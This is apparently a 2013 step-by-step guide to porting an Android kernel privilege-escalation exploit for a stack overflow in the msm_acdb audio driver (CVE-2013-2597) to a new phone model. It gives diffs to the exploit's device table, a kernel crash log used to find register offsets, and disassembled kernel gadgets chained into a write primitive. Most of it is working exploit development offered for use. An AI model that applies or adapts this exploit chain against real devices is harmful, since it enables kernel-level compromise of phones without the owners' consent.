Created
July 28, 2013 04:42
Stack-based buffer overflow in acdb audio driver (CVE-2013-2597)
To use the msm_acdb exploit we need to work through 4 steps.
1. Find how to run a command with root or system privilege
2. Get the offsets of the registers to set up
3. Choose suitable code in the kernel image
4. Set up the parameters in acdb.c
1. Find how to run a command with root or system privilege
Do it yourself. :-P
2. Get the offsets of the registers to set up
- Add a dummy entry to get a crash log.
--- a/acdb.c | |
+++ b/acdb.c | |
@@ -43,6 +43,7 @@ static supported_device supported_devices[] = { | |
{ DEVICE_SH04E_01_00_02, { 0x7c, 0x88, { 0x8c, 0xc02498e0 }, { 0xac, 0xc000dd1c } } }, | |
{ DEVICE_SH04E_01_00_03, { 0x7c, 0x88, { 0x8c, 0xc0249a20 }, { 0xac, 0xc024bdd8 } } }, | |
{ DEVICE_SH04E_01_00_04, { 0x7c, 0x88, { 0x8c, 0xc0249a20 }, { 0xac, 0xc024bdd8 } } }, | |
+ { DEVICE_SH05E_01_00_05, { 0, 0, { 0, 0}, { 0, 0} } }, | |
{ DEVICE_SO04D_7_0_D_1_137, { 0x80, 0x90, { 0x9c, 0xc0326a38 }, { 0xbc, 0xc0526964 } } }, | |
{ DEVICE_SO05D_7_0_D_1_137, { 0x80, 0x90, { 0x9c, 0xc03265d8 }, { 0xbc, 0xc0524d84 } } }, | |
{ DEVICE_SOL21_9_1_D_0_395, { 0x7c, 0x88, { 0x8c, 0xc0244778 }, { 0xac, 0xc000dd24 } } }, | |
- Build the tool
- Stop services to avoid losing data
- Run the tool with root or system privilege
The device will reboot because the kernel panics.
- See the crash log
(e.g. /proc/last_kmsg or the log partition)
<3>[ 348.770486] ACDB=> ACDB ioctl not found! | |
<1>[ 348.770547] Unable to handle kernel NULL pointer dereference at virtual address 0000009c | |
<1>[ 348.770608] pgd = df18c000 | |
<1>[ 348.770639] [0000009c] *pgd=9b727831, *pte=00000000, *ppte=00000000 | |
<0>[ 348.770700] Internal error: Oops: 80000007 [#1] PREEMPT SMP | |
<4>[ 348.770761] Modules linked in: | |
<4>[ 348.770791] CPU: 0 Not tainted (3.0.8 #1) | |
<4>[ 348.770853] PC is at 0x9c | |
<4>[ 348.770883] LR is at acdb_ioctl+0x740/0x860 | |
<4>[ 348.770944] pc : [<0000009c>] lr : [<c0137658>] psr: 60000013 | |
<4>[ 348.770944] sp : ce513f28 ip : 00000000 fp : 00000098 | |
<4>[ 348.771005] r10: 00000094 r9 : 00000090 r8 : 0000008c | |
<4>[ 348.771066] r7 : 00000088 r6 : 00000084 r5 : 00000080 r4 : 0000007c | |
<4>[ 348.771097] r3 : 00000000 r2 : ce513e74 r1 : c0973db8 r0 : 00000000 | |
<4>[ 348.771158] Flags: nZCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment user | |
You'll find the offsets of the registers within the buffer.
R4 : 0x7c | |
R5 : 0x80 | |
R6 : 0x84 | |
R7 : 0x88 | |
R8 : 0x8c | |
R9 : 0x90 | |
R10: 0x94 | |
R11: 0x98 | |
PC : 0x9c | |
- Disassemble do_vfs_ioctl and check its return (epilogue) code
c021d8fc: e2 8d d0 44 ADD SP, SP, #$44 | |
c021d900: e8 bd 83 f0 LDMUW [SP], { R4-R9, PC } | |
You'll find it adds 0x44 bytes to SP and restores registers R4-R9 and PC.
3. Choose suitable code in the kernel image
- From the kernel image, choose code that writes a value and code that ends do_vfs_ioctl
They should use the same stack size and restore the same registers as do_vfs_ioctl, like this:
write code: uses R9 as the write address and R5 as the write value, and uses 0x20 bytes
c0381b98: e5 89 50 00 STR R5, [R9] | |
c0381b9c: e8 bd 87 f0 LDMUW [SP], { R4-R10, PC } | |
end do_vfs_ioctl code: uses 0x24 bytes (= 0x44 - 0x20) and restores R4-R9 and PC
c0231b98: e2 8d d0 24 ADD SP, SP, #$24 | |
c0231b9c: e8 bd 83 f0 LDMUW [SP], { R4-R9, PC } | |
4. Set up the parameters in acdb.c
- Set up the parameters in acdb.c
The write value is in R5, offset = 0x80
The write address is in R9, offset = 0x90
The write code is at offset 0x9c, address = 0xc0381b98
The end-of-do_vfs_ioctl code is at offset 0xbc (= 0x9c + 0x20), address = 0xc0231b98
--- a/acdb.c | |
+++ b/acdb.c | |
@@ -43,6 +43,7 @@ static supported_device supported_devices[] = { | |
{ DEVICE_SH04E_01_00_02, { 0x7c, 0x88, { 0x8c, 0xc02498e0 }, { 0xac, 0xc000dd1c } } }, | |
{ DEVICE_SH04E_01_00_03, { 0x7c, 0x88, { 0x8c, 0xc0249a20 }, { 0xac, 0xc024bdd8 } } }, | |
{ DEVICE_SH04E_01_00_04, { 0x7c, 0x88, { 0x8c, 0xc0249a20 }, { 0xac, 0xc024bdd8 } } }, | |
+ { DEVICE_SH05E_01_00_05, { 0x80, 0x90, { 0x9c, 0xc0381b98 }, { 0xbc, 0xc0231b98} } }, | |
{ DEVICE_SO04D_7_0_D_1_137, { 0x80, 0x90, { 0x9c, 0xc0326a38 }, { 0xbc, 0xc0526964 } } }, | |
{ DEVICE_SO05D_7_0_D_1_137, { 0x80, 0x90, { 0x9c, 0xc03265d8 }, { 0xbc, 0xc0524d84 } } }, | |
{ DEVICE_SOL21_9_1_D_0_395, { 0x7c, 0x88, { 0x8c, 0xc0244778 }, { 0xac, 0xc000dd24 } } }, | |
That's all. Have fun!! |